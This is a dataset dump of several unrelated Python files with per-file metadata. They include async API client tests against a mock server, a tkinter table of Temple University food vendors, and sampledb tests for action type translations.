text=json.dumps({"next": None, "results": [{"baz": "quux"}]}),
)
result = await asyncio.wait_for(task, pytest.TIMEOUT)
assert result == [{"foo": "bar"}, {"baz": "quux"}]
@pytest.mark.asyncio
async def test_get_instruments_value_error(logged_in_client):
client, _ = logged_in_client
with pytest.raises(ValueError):
await client.get_instruments()
with pytest.raises(ValueError):
await client.get_instruments(symbol="ABCD", ids=["12345"])
@pytest.mark.asyncio
async def test_get_quotes_by_symbols(logged_in_client):
client, server = logged_in_client
task = asyncio.create_task(client.get_quotes(symbols=["ABCD"]))
request = await server.receive_request(timeout=pytest.TIMEOUT)
assert request.method == "GET"
assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
assert request.path == QUOTES.path
assert request.query["symbols"] == "ABCD"
server.send_response(
request,
content_type="application/json",
text=json.dumps({"results": [{}]}),
)
result = await asyncio.wait_for(task, pytest.TIMEOUT)
assert result == [{}]
@pytest.mark.asyncio
async def test_get_quotes_by_instruments(logged_in_client):
client, server = logged_in_client
task = asyncio.create_task(client.get_quotes(instruments=["<>"]))
request = await server.receive_request(timeout=pytest.TIMEOUT)
assert request.method == "GET"
assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
assert request.path == QUOTES.path
assert request.query["instruments"] == "<>"
server.send_response(
request,
content_type="application/json",
text=json.dumps({"results": [{}]}),
)
result = await asyncio.wait_for(task, pytest.TIMEOUT)
assert result == [{}]
@pytest.mark.asyncio
async def test_get_quotes_value_error(logged_in_client):
client, _ = logged_in_client
with pytest.raises(ValueError):
await client.get_quotes()
with pytest.raises(ValueError):
await client.get_quotes(symbols=["ABCD"], instruments=["<>"])
@pytest.mark.asyncio
async def test_get_historical_quotes_by_symbols(logged_in_client):
client, server = logged_in_client
task = asyncio.create_task(
client.get_historical_quotes(
interval=HistoricalInterval.FIVE_MIN,
span=HistoricalSpan.DAY,
symbols=["ABCD"],
)
)
request = await server.receive_request(timeout=pytest.TIMEOUT)
assert request.method == "GET"
assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
assert request.path == HISTORICALS.path
assert request.query["bounds"] == "regular"
assert request.query["interval"] == HistoricalInterval.FIVE_MIN.value
assert request.query["span"] == HistoricalSpan.DAY.value
assert request.query["symbols"] == "ABCD"
server.send_response(
request,
content_type="application/json",
text=json.dumps({"results": [{}]}),
)
result = await asyncio.wait_for(task, pytest.TIMEOUT)
assert result == [{}]
@pytest.mark.asyncio
async def test_get_historical_quotes_by_instruments(logged_in_client):
client, server = logged_in_client
task = asyncio.create_task(
client.get_historical_quotes(
interval=HistoricalInterval.FIVE_MIN,
span=HistoricalSpan.DAY,
instruments=["<>"],
)
)
request = await server.receive_request(timeout=pytest.TIMEOUT)
assert request.method == "GET"
assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
assert request.path == HISTORICALS.path
assert request.query["bounds"] == "regular"
assert request.query["interval"] == HistoricalInterval.FIVE_MIN.value
assert request.query["span"] == HistoricalSpan.DAY.value
assert request.query["instruments"] == "<>"
server.send_response(
request,
content_type="application/json",
text=json.dumps({"results": [{}]}),
)
result = await asyncio.wait_for(task, pytest.TIMEOUT)
assert result == [{}]
@pytest.mark.asyncio
async def test_get_historical_quotes_value_error(logged_in_client):
client, _ = logged_in_client
with pytest.raises(ValueError):
await client.get_historical_quotes()
with pytest.raises(ValueError):
await client.get_historical_quotes(symbols=["ABCD"], instruments=["<>"])
@pytest.mark.asyncio
async def test_get_ratings(logged_in_client):
client, server = logged_in_client
task = asyncio.create_task(client.get_ratings(ids=["12345", "67890"]))
request = await server.receive_request(timeout=pytest.TIMEOUT)
assert request.method == "GET"
assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
assert request.path == RATINGS.path
assert request.query["ids"] == "12345,67890"
server.send_response(
request,
content_type="application/json",
text=json.dumps({"next": str(pytest.NEXT), "results": [{"foo": "bar"}]}),
)
request = await server.receive_request(timeout=pytest.TIMEOUT)
assert request.method == "GET"
assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
assert request.path == pytest.NEXT.path
server.send_response(
request,
content_type="application/json",
text=json.dumps({"next": None, "results": [{"baz": "quux"}]}),
)
result = await asyncio.wait_for(task, pytest.TIMEOUT)
assert result == [{"foo": "bar"}, {"baz": "quux"}]
@pytest.mark.asyncio
async def test_get_tags(logged_in_client):
client, server = logged_in_client
task = asyncio.create_task(client.get_tags(id_="12345"))
request = await server.receive_request(timeout=pytest.TIMEOUT)
assert request.method == "GET"
assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
assert request.path == (TAGS / "instrument" / "12345/").path
server.send_response(
request,
content_type="application/json",
text=json.dumps({"tags": [{"slug": "foo"}]}),
)
result = await asyncio.wait_for(task, pytest.TIMEOUT)
assert result == ["foo"]
@pytest.mark.asyncio
async def test_get_tag_members(logged_in_client):
client, server = logged_in_client
task = asyncio.create_task(client.get_tag_members(tag="foo"))
request = await server.receive_request(timeout=pytest.TIMEOUT)
assert request.method == "GET"
assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
assert request.path == (TAGS / "tag" / "foo/").path
server.send_response(
request,
content_type="application/json",
text=json.dumps({"instruments": ["<>"]}),
)
result = await asyncio.wait_for(task, pytest.TIMEOUT)
assert result == ["<>"]
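# --- Hedged convenience sketch (not part of the test suite) -----------------
# Every test above repeats the same handshake with the mock server: receive one
# request, assert it is an authorised GET for the expected path, then reply with
# a JSON body.  respond_json() is a hypothetical helper, built only from calls
# already used in this file, that factors out that pattern.
async def respond_json(server, expected_path, payload):
    """Receive one request, assert it is an authorised GET, and reply with JSON."""
    request = await server.receive_request(timeout=pytest.TIMEOUT)
    assert request.method == "GET"
    assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
    assert request.path == expected_path
    server.send_response(
        request,
        content_type="application/json",
        text=json.dumps(payload),
    )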
| 34.287066
| 81
| 0.683228
| 1,255
| 10,869
| 5.734661
| 0.066135
| 0.10296
| 0.058358
| 0.045852
| 0.956927
| 0.954703
| 0.949423
| 0.944977
| 0.921078
| 0.899264
| 0
| 0.005048
| 0.179777
| 10,869
| 316
| 82
| 34.39557
| 0.802243
| 0
| 0
| 0.714286
| 0
| 0
| 0.119974
| 0.027049
| 0
| 0
| 0
| 0
| 0.262548
| 1
| 0
| false
| 0
| 0.019305
| 0
| 0.019305
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1521271b947ecd6f345d1af01ccc654845f410b3
| 130
|
py
|
Python
|
2020/alaska2-image-steganalysis/datasets/__init__.py
|
kn25ha01/kaggle-competitions
|
fce44d6758c4757a7d0a0a6b00d756ff26a97d3f
|
[
"MIT"
] | null | null | null |
2020/alaska2-image-steganalysis/datasets/__init__.py
|
kn25ha01/kaggle-competitions
|
fce44d6758c4757a7d0a0a6b00d756ff26a97d3f
|
[
"MIT"
] | null | null | null |
2020/alaska2-image-steganalysis/datasets/__init__.py
|
kn25ha01/kaggle-competitions
|
fce44d6758c4757a7d0a0a6b00d756ff26a97d3f
|
[
"MIT"
] | null | null | null |
from .dataset_factory import get_dataloader, get_dataset
from .dataset_factory import get_train_valid_data, get_local_test_data
| 26
| 70
| 0.876923
| 20
| 130
| 5.2
| 0.55
| 0.211538
| 0.346154
| 0.461538
| 0.519231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.092308
| 130
| 4
| 71
| 32.5
| 0.881356
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
153b1ef327a7d2dc00d3bb112386e7804f533da7
| 8,006
|
py
|
Python
|
temple UI.py
|
cchoiyon/FinalProject2021
|
7dd08b4caedeec2785368b461e93e48b3a9bc5db
|
[
"MIT"
] | null | null | null |
temple UI.py
|
cchoiyon/FinalProject2021
|
7dd08b4caedeec2785368b461e93e48b3a9bc5db
|
[
"MIT"
] | null | null | null |
temple UI.py
|
cchoiyon/FinalProject2021
|
7dd08b4caedeec2785368b461e93e48b3a9bc5db
|
[
"MIT"
] | null | null | null |
#temple Eats UI
import tkinter
from tkinter import *
class Veg_Table:
def __init__(self,root):
#code for creating table
for r in range(total_rows):
for c in range(total_columns):
self.e = Entry(root, width=65, fg='purple',font=('Arial',7,'bold'))
self.e.grid(row=r, column=c,)
self.e.insert(END, Veg_lst[r][c])
#take the data
Veg_lst = [('VEG RESTAURANTS','ACCEPTED PAYMENT TYPES'),
('Dev Food Truck','debit/credit/cash'),
('Tommy Lunch Truck','debit/credit/cash'),
('Little Lulu','debit/credit/cash'),
('Tasty Eats','debit/credit/cash'),
('4 Brothers','debit/credit/cash'),
('New York Gyro','debit/credit/cash'),
('Mountain Pizza','debit/credit/cash'),
('Philly Halal Gyro','debit/credit/cash'),
('Mexican Grill Stand','debit/credit/cash'),
('Halal Gyro Express','debit/credit/cash'),
('Famous NY Gyro','debit/credit/cash'),
('Caribbean Feast','debit/credit/cash'),
('Sunny Halal Food','debit/credit/cash'),
('Eddies','debit/credit/cash'),
('Sexy Green Truck','debit/credit/cash'),
('Cha Cha','debit/credit/cash'),
('Eppys Truck','debit/credit/cash'),
('Ernies','debit/credit/cash'),
('The Fruit Salad & smoothie truck','debit/credit/cash'),
('E&E Gourmet Express','debit/credit/cash'),
('Chicken Heaven','debit/credit/cash'),
('Chop Chop','debit/credit/cash'),
('Fruit Salad','debit/credit/cash'),
('Kobawoo Express','debit/credit/cash'),
('Jamaican Ds','debit/credit/cash'),
('Philly Fellas Gyro Halal','debit/credit/cash'),
('Brother Pizza','debit/credit/cash'),
('Temple Teppanyaki','debit/credit/cash'),
('Foot Long','debit/credit/cash'),
('Honey','debit/credit/cash'),
('Richie Lunch Box','debit/credit/cash'),
('Cloud','debit/credit/cash'),
('Samosa Deb','debit/credit/cash'),
('Top Bap','debit/credit/cash'),
('Ray Truck','debit/credit/cash'),
('The Creperie Truck','debit/credit/cash'),
('Burger Tank','debit/credit/cash'),
('El Guaco Loco','debit/credit/cash'),
('Korea House','debit/credit/cash'),
('Vegan Tree','debit/credit/cash'),
('Subway','debit/credit/cash | diamond dollars'),
('Zen','meal equivalency | debit/credit/cash | diamond dollars'),
('Esposito Dining Center','meal plan | meal equivalency | debit/credit/cash | diamond dollars'),
('Twisted Taco','meal equivalency | debit/credit/cash | diamond dollars'),
('Morgan Dining Hall','meal plan | meal equivalency | debit/credit/cash | diamond dollars'),
('BurgerFi','meal equivalency | debit/credit/cash | diamond dollars'),
('Saladworks','meal equivalency | debit/credit/cash | diamond dollars'),
('Starbucks','debit/credit/cash | diamond dollars'),
('Pita and Co.','meal equivalency | debit/credit/cash | diamond dollars'),
('Panda Express','meal equivalency | debit/credit/cash | diamond dollars'),
('Jamba','debit/credit/cash'),
('Java City','debit/credit/cash'),
('Stella Café','debit/credit/cash')]
#find total number of rows and
#columns in list
total_rows = len(Veg_lst)
total_columns = len(Veg_lst[0])
# create root window
root = Tk()
t = Veg_Table(root)
root.mainloop()
class NonVeg_Table:
def __init__(self,root):
#code for creating table
for r in range(total_rows):
for c in range(total_columns):
self.e = Entry(root, width=65, fg='red',font=('Arial',7,'bold'))
self.e.grid(row=r, column=c)
self.e.insert(END, NonVeg_lst[r][c])
NonVeg_lst = [('NON-VEG RESTAURANTS','ACCEPTED PAYMENT TYPES'),
('Dev Food Truck','debit/credit/cash'),
('Tommy Lunch Truck','debit/credit/cash'),
('Little Lulu','debit/credit/cash'),
('Tasty Eats','debit/credit/cash'),
('4 Brothers','debit/credit/cash'),
('New York Gyro','debit/credit/cash'),
('Mountain Pizza','debit/credit/cash'),
('Philly Halal Gyro','debit/credit/cash'),
('Mexican Grill Stand','debit/credit/cash'),
('Halal Gyro Express','debit/credit/cash'),
('Famous NY Gyro','debit/credit/cash'),
('Caribbean Feast','debit/credit/cash'),
('Sunny Halal Food','debit/credit/cash'),
('Eddies','debit/credit/cash'),
('Sexy Green Truck','debit/credit/cash'),
('Cha Cha','debit/credit/cash'),
('Eppys Truck','debit/credit/cash'),
('Ernies','debit/credit/cash'),
('E&E Gourmet Express','debit/credit/cash'),
('Chicken Heaven','debit/credit/cash'),
('Chop Chop','debit/credit/cash'),
('Kobawoo Express','debit/credit/cash'),
('Jamaican Ds','debit/credit/cash'),
('Philly Fellas Gyro Halal','debit/credit/cash'),
('Brother Pizza','debit/credit/cash'),
('Temple Teppanyaki','debit/credit/cash'),
('Foot Long','debit/credit/cash'),
('Honey','debit/credit/cash'),
('Richie Lunch Box','debit/credit/cash'),
('Samosa Deb','debit/credit/cash'),
('Top Bap','debit/credit/cash'),
('Ray Truck','debit/credit/cash'),
('Burger Tank','debit/credit/cash'),
('El Guaco Loco','debit/credit/cash'),
('Korea House','debit/credit/cash'),
('Esposito Dining Center','meal plan | meal equivalency | debit/credit/cash | diamond dollars'),
('Morgan Dining Hall','meal plan | meal equivalency | debit/credit/cash | diamond dollars'),
('BurgerFi','meal equivalency | debit/credit/cash | diamond dollars'),
('Saladworks','meal equivalency | debit/credit/cash | diamond dollars'),
('Which Wich','meal equivalency | debit/credit/cash | diamond dollars'),
('Chick-fil-a','meal equivalency | debit/credit/cash | diamond dollars'),
('Twisted Taco','meal equivalency | debit/credit/cash | diamond dollars'),
('Panda Express','meal equivalency | debit/credit/cash | diamond dollars'),
('Bento Sushi','meal equivalency | debit/credit/cash | diamond dollars'),
('Così','debit/credit/cash'),
('Zaydee Kosher Delicatessen','debit/credit/cash')]
total_rows = len(NonVeg_lst)
total_columns = len(NonVeg_lst[0])
# create root window
root = Tk()
t = NonVeg_Table(root)
root.mainloop()
class Vegan_Table:
def __init__(self,root):
#code for creating table
for r in range(total_rows):
for c in range(total_columns):
self.e = Entry(root, width=65, fg='green',font=('Arial',8,'bold'))
self.e.grid(row=r, column=c)
self.e.insert(END, Vegan_lst[r][c])
Vegan_lst =[('VEGAN RESTAURANTS','ACCEPTED PAYMENT TYPES'),
('Dev Food Truck','debit/credit/cash'),
('New York Gyro','debit/credit/cash'),
('Mountain Pizza','debit/credit/cash'),
('Philly Halal Gyro','debit/credit/cash'),
('Mexican Grill Stand','debit/credit/cash'),
('Halal Gyro Express','debit/credit/cash'),
('Famous NY Gyro','debit/credit/cash'),
('Sunny Halal Food','debit/credit/cash'),
('Ernies','debit/credit/cash'),
('The Fruit Salad & smoothie truck','debit/credit/cash'),
('Chicken Heaven','debit/credit/cash'),
('Fruit Salad','debit/credit/cash'),
('Philly Fellas gyro halal','debit/credit/cash'),
('Samosa Deb','debit/credit/cash'),
('Ray Truck','debit/credit/cash'),
('Vegan Tree','debit/credit/cash'),
('Subway','Diamond dollars | debit/credit/cash'),
('Esposito Dining center','Meal plan | meal equivalency | debit/credit/cash | diamond dollars'),
('Twisted Taco','meal equivalency | debit/credit/cash | diamond dollars'),
('Morgan Dining Hall','meal plan | meal equivalency | debit/credit/cash | diamond dollars'),
('BurgerFi','meal equivalency | debit/credit/cash | diamond dollars'),
('Saladworks','meal equivalency | debit/credit/cash | diamond dollars'),
('Starbucks','debit/credit/cash | diamond dollars'),
('Pita and Co.','meal equivalency | debit/credit/cash | diamond dollars'),
('Panda Express','meal equivalency | debit/credit/cash | diamond dollars'),
('Jamba','debit/credit/cash'),
('Java City','debit/credit/cash'),
('Stella Café','debit/credit/cash')]
total_rows = len(Vegan_lst)
total_columns = len(Vegan_lst[0])
# create root window
root = Tk()
t = Vegan_Table(root)
root.mainloop()
| 38.676329
| 97
| 0.654384
| 1,043
| 8,006
| 4.982742
| 0.160115
| 0.268809
| 0.366558
| 0.114297
| 0.91803
| 0.902444
| 0.894939
| 0.86954
| 0.838561
| 0.821435
| 0
| 0.002056
| 0.149388
| 8,006
| 206
| 98
| 38.864078
| 0.761087
| 0.024607
| 0
| 0.785714
| 0
| 0
| 0.655777
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017857
| false
| 0
| 0.011905
| 0
| 0.047619
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
15b8ad5b3e7c4cb2e9b0fe77dc08ed802bd722e8
| 113
|
py
|
Python
|
mmdet/version.py
|
cmdi-dlut/SMPR
|
8481982fcf5c792b154f2b4cc6648de4b42bb1ec
|
[
"Apache-2.0"
] | 5
|
2020-12-10T09:51:42.000Z
|
2021-04-30T22:02:11.000Z
|
mmdet/version.py
|
miaohxDLUT/SMPR
|
f5388d80892742eec106d19266dc79378195336f
|
[
"Apache-2.0"
] | 2
|
2020-12-14T02:53:05.000Z
|
2021-03-05T07:26:07.000Z
|
mmdet/version.py
|
cmdi-dlut/SMPR
|
8481982fcf5c792b154f2b4cc6648de4b42bb1ec
|
[
"Apache-2.0"
] | 3
|
2020-12-25T08:34:35.000Z
|
2021-05-16T15:40:55.000Z
|
# GENERATED VERSION FILE
# TIME: Sun Aug 30 00:34:46 2020
__version__ = '1.0.0+5d75636'
short_version = '1.0.0'
| 18.833333
| 32
| 0.699115
| 21
| 113
| 3.52381
| 0.714286
| 0.216216
| 0.243243
| 0.27027
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.252632
| 0.159292
| 113
| 5
| 33
| 22.6
| 0.526316
| 0.469027
| 0
| 0
| 1
| 0
| 0.315789
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
01ee5e3b354dc0818dfb7a80a5601304f887cc08
| 11,860
|
py
|
Python
|
tests/logic/test_action_type_translations.py
|
nilsholle/sampledb
|
90d7487a3990995ca2ec5dfd8b59d4739d6a9a87
|
[
"MIT"
] | 5
|
2020-02-13T15:25:37.000Z
|
2021-05-06T21:05:14.000Z
|
tests/logic/test_action_type_translations.py
|
nilsholle/sampledb
|
90d7487a3990995ca2ec5dfd8b59d4739d6a9a87
|
[
"MIT"
] | 28
|
2019-11-12T14:14:08.000Z
|
2022-03-11T16:29:27.000Z
|
tests/logic/test_action_type_translations.py
|
nilsholle/sampledb
|
90d7487a3990995ca2ec5dfd8b59d4739d6a9a87
|
[
"MIT"
] | 8
|
2019-12-10T15:46:02.000Z
|
2021-11-02T12:24:52.000Z
|
# coding: utf-8
"""
"""
import pytest
import sampledb
from sampledb.logic import actions, action_type_translations, errors
def test_set_action_type_translation():
action_type = actions.create_action_type(
admin_only=False,
show_on_frontpage=True,
show_in_navbar=True,
enable_labels=True,
enable_files=True,
enable_locations=True,
enable_publications=True,
enable_comments=True,
enable_activity_log=True,
enable_related_objects=True,
enable_project_link=True,
)
action_type_translations.set_action_type_translation(
language_id=sampledb.logic.languages.Language.ENGLISH,
action_type_id=action_type.id,
name="Example Action Type",
description="This is an example action type",
object_name="Object 1",
object_name_plural="Objects 1",
view_text="View Objects 1",
perform_text="Create Object 1"
)
action_type_translation = action_type_translations.get_action_type_translation_for_action_type_in_language(
action_type_id=action_type.id,
language_id=sampledb.logic.languages.Language.ENGLISH
)
assert action_type_translation.name == "Example Action Type"
assert action_type_translation.description == "This is an example action type"
assert action_type_translation.object_name == "Object 1"
assert action_type_translation.object_name_plural == "Objects 1"
assert action_type_translation.view_text == "View Objects 1"
assert action_type_translation.perform_text == "Create Object 1"
action_type_translations.set_action_type_translation(
language_id=sampledb.logic.languages.Language.ENGLISH,
action_type_id=action_type.id,
name="Example Action Type 2",
description="This is an example action type 2",
object_name="Object 2",
object_name_plural="Objects 2",
view_text="View Objects 2",
perform_text="Create Object 2"
)
action_type_translation = action_type_translations.get_action_type_translation_for_action_type_in_language(
action_type_id=action_type.id,
language_id=sampledb.logic.languages.Language.ENGLISH
)
assert action_type_translation.name == "Example Action Type 2"
assert action_type_translation.description == "This is an example action type 2"
assert action_type_translation.object_name == "Object 2"
assert action_type_translation.object_name_plural == "Objects 2"
assert action_type_translation.view_text == "View Objects 2"
assert action_type_translation.perform_text == "Create Object 2"
with pytest.raises(errors.LanguageDoesNotExistError):
action_type_translations.set_action_type_translation(
language_id=42,
action_type_id=action_type.id,
name="Example Action Type 2",
description="This is an example action type 2",
object_name="Object 2",
object_name_plural="Objects 2",
view_text="View Objects 2",
perform_text="Create Object 2"
)
with pytest.raises(errors.ActionTypeDoesNotExistError):
action_type_translations.set_action_type_translation(
language_id=sampledb.logic.languages.Language.ENGLISH,
action_type_id=action_type.id + 1,
name="Example Action Type 2",
description="This is an example action type 2",
object_name="Object 2",
object_name_plural="Objects 2",
view_text="View Objects 2",
perform_text="Create Object 2"
)
def test_get_action_translations_for_action():
action_type = actions.create_action_type(
admin_only=False,
show_on_frontpage=True,
show_in_navbar=True,
enable_labels=True,
enable_files=True,
enable_locations=True,
enable_publications=True,
enable_comments=True,
enable_activity_log=True,
enable_related_objects=True,
enable_project_link=True,
)
assert not action_type_translations.get_action_type_translations_for_action_type(action_type.id)
assert len(action_type_translations.get_action_type_translations_for_action_type(action_type.id, use_fallback=True)) == 1
action_type_translation = action_type_translations.get_action_type_translations_for_action_type(action_type.id, use_fallback=True)[0]
assert action_type_translation.name == f"#{action_type.id}"
assert action_type_translation.description == ''
assert action_type_translation.object_name == 'Object'
assert action_type_translation.object_name_plural == 'Objects'
assert action_type_translation.view_text == 'View Objects'
assert action_type_translation.perform_text == 'Create Object'
action_type_translations.set_action_type_translation(
language_id=sampledb.logic.languages.Language.ENGLISH,
action_type_id=action_type.id,
name="Example Action Type",
description="This is an example action type",
object_name="Object 1",
object_name_plural="Objects 1",
view_text="View Objects 1",
perform_text="Create Object 1"
)
assert len(action_type_translations.get_action_type_translations_for_action_type(action_type.id)) == 1
action_type_translation = action_type_translations.get_action_type_translations_for_action_type(action_type.id)[0]
assert action_type_translation.name == "Example Action Type"
action_type_translations.set_action_type_translation(
language_id=sampledb.logic.languages.Language.GERMAN,
action_type_id=action_type.id,
name="Example Action Type",
description="This is an example action type",
object_name="Object 2",
object_name_plural="Objects 2",
view_text="View Objects 2",
perform_text="Create Object 2"
)
assert len(action_type_translations.get_action_type_translations_for_action_type(action_type.id)) == 2


def test_get_action_translation_for_action_in_language():
    action_type = actions.create_action_type(
        admin_only=False,
        show_on_frontpage=True,
        show_in_navbar=True,
        enable_labels=True,
        enable_files=True,
        enable_locations=True,
        enable_publications=True,
        enable_comments=True,
        enable_activity_log=True,
        enable_related_objects=True,
        enable_project_link=True,
    )
    with pytest.raises(errors.ActionTypeTranslationDoesNotExistError):
        action_type_translations.get_action_type_translation_for_action_type_in_language(
            language_id=sampledb.logic.languages.Language.ENGLISH,
            action_type_id=action_type.id,
        )
    action_type_translation = action_type_translations.get_action_type_translation_for_action_type_in_language(
        language_id=sampledb.logic.languages.Language.ENGLISH,
        action_type_id=action_type.id,
        use_fallback=True
    )
    assert action_type_translation.language.lang_code == 'en'
    assert action_type_translation.name == f'#{action_type.id}'
    assert action_type_translation.description == ''
    action_type_translations.set_action_type_translation(
        language_id=sampledb.logic.languages.Language.ENGLISH,
        action_type_id=action_type.id,
        name="Example Action Type",
        description="This is an example action type",
        object_name='Example',
        object_name_plural='Examples',
        view_text='View Examples',
        perform_text='Define Example'
    )
    action_type_translation = action_type_translations.get_action_type_translation_for_action_type_in_language(
        language_id=sampledb.logic.languages.Language.ENGLISH,
        action_type_id=action_type.id,
    )
    assert action_type_translation.name == "Example Action Type"
    assert action_type_translation.description == "This is an example action type"
    action_type_translation = action_type_translations.get_action_type_translation_for_action_type_in_language(
        language_id=sampledb.logic.languages.Language.GERMAN,
        action_type_id=action_type.id,
        use_fallback=True
    )
    assert action_type_translation.name == "Example Action Type"
    assert action_type_translation.description == "This is an example action type"
    action_type_translations.set_action_type_translation(
        language_id=sampledb.logic.languages.Language.GERMAN,
        action_type_id=action_type.id,
        name="Beispielaktionstyp",
        description="Dies ist ein Beispielaktionstyp",
        object_name='Beispiel',
        object_name_plural='Beispiele',
        view_text='Beispiele anzeigen',
        perform_text='Beispiel definieren'
    )
    action_type_translation = action_type_translations.get_action_type_translation_for_action_type_in_language(
        language_id=sampledb.logic.languages.Language.GERMAN,
        action_type_id=action_type.id,
        use_fallback=True
    )
    assert action_type_translation.name == "Beispielaktionstyp"
    assert action_type_translation.description == "Dies ist ein Beispielaktionstyp"
    action_type_translations.set_action_type_translation(
        language_id=sampledb.logic.languages.Language.GERMAN,
        action_type_id=action_type.id,
        name="",
        description="Dies ist ein Beispielaktionstyp",
        object_name='Beispiel',
        object_name_plural='Beispiele',
        view_text='',
        perform_text='Beispiel definieren'
    )
    action_type_translation = action_type_translations.get_action_type_translation_for_action_type_in_language(
        language_id=sampledb.logic.languages.Language.GERMAN,
        action_type_id=action_type.id,
        use_fallback=True
    )
    assert action_type_translation.name == "Example Action Type"
    assert action_type_translation.description == "Dies ist ein Beispielaktionstyp"
    assert action_type_translation.view_text == "View Examples"
    action_type_translation = action_type_translations.get_action_type_translation_for_action_type_in_language(
        language_id=sampledb.logic.languages.Language.GERMAN,
        action_type_id=action_type.id,
        use_fallback=False
    )
    assert action_type_translation.name == ""
    assert action_type_translation.description == "Dies ist ein Beispielaktionstyp"
    assert action_type_translation.view_text == ""


def test_delete_action_translation():
    action_type = actions.create_action_type(
        admin_only=False,
        show_on_frontpage=True,
        show_in_navbar=True,
        enable_labels=True,
        enable_files=True,
        enable_locations=True,
        enable_publications=True,
        enable_comments=True,
        enable_activity_log=True,
        enable_related_objects=True,
        enable_project_link=True,
    )
    action_type_translations.set_action_type_translation(
        language_id=sampledb.logic.languages.Language.ENGLISH,
        action_type_id=action_type.id,
        name="Example Action Type",
        description="This is an example action type",
        object_name="Object",
        object_name_plural="Objects",
        view_text="View Objects",
        perform_text="Create Object"
    )
    assert len(action_type_translations.get_action_type_translations_for_action_type(action_type.id)) == 1
    action_type_translations.delete_action_type_translation(
        language_id=sampledb.logic.languages.Language.ENGLISH,
        action_type_id=action_type.id
    )
    assert len(action_type_translations.get_action_type_translations_for_action_type(action_type.id)) == 0
    with pytest.raises(errors.ActionTypeTranslationDoesNotExistError):
        action_type_translations.delete_action_type_translation(
            language_id=sampledb.logic.languages.Language.ENGLISH,
            action_type_id=action_type.id
        )
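# Taken together, these tests exercise the fallback behaviour of action type translations:
# with use_fallback=True a missing translation falls back to English or to the built-in
# defaults, and empty fields within a translation fall back to the English values.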
| 42.056738
| 137
| 0.73027
| 1,437
| 11,860
| 5.631872
| 0.059847
| 0.255777
| 0.171259
| 0.113431
| 0.945138
| 0.933646
| 0.933029
| 0.919684
| 0.846163
| 0.822686
| 0
| 0.005347
| 0.195784
| 11,860
| 281
| 138
| 42.206406
| 0.843154
| 0.001096
| 0
| 0.69685
| 0
| 0
| 0.123173
| 0
| 0
| 0
| 0
| 0
| 0.15748
| 1
| 0.015748
| false
| 0
| 0.011811
| 0
| 0.027559
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| bf1a21288fe8b911d6a092f6c6e2161b77b8a4cd
| 167
| py
| Python
| util/test/metrics/__init__.py
| henriquesimoes/humpback
| ba687a71f95ef9c9c30426eefae11a69efd6f942
| ["BSD-3-Clause"] | null | null | null
| util/test/metrics/__init__.py
| henriquesimoes/humpback
| ba687a71f95ef9c9c30426eefae11a69efd6f942
| ["BSD-3-Clause"] | null | null | null
| util/test/metrics/__init__.py
| henriquesimoes/humpback
| ba687a71f95ef9c9c30426eefae11a69efd6f942
| ["BSD-3-Clause"] | null | null | null |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from .mapk import mapk, apk
from .topk import precisionk
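# Note: this __init__ simply re-exports the metric helpers, so callers can write
# `from util.test.metrics import mapk, apk, precisionk` instead of importing each submodule.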
| 23.857143
| 38
| 0.850299
| 23
| 167
| 5.565217
| 0.478261
| 0.234375
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131737
| 167
| 6
| 39
| 27.833333
| 0.882759
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.2
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
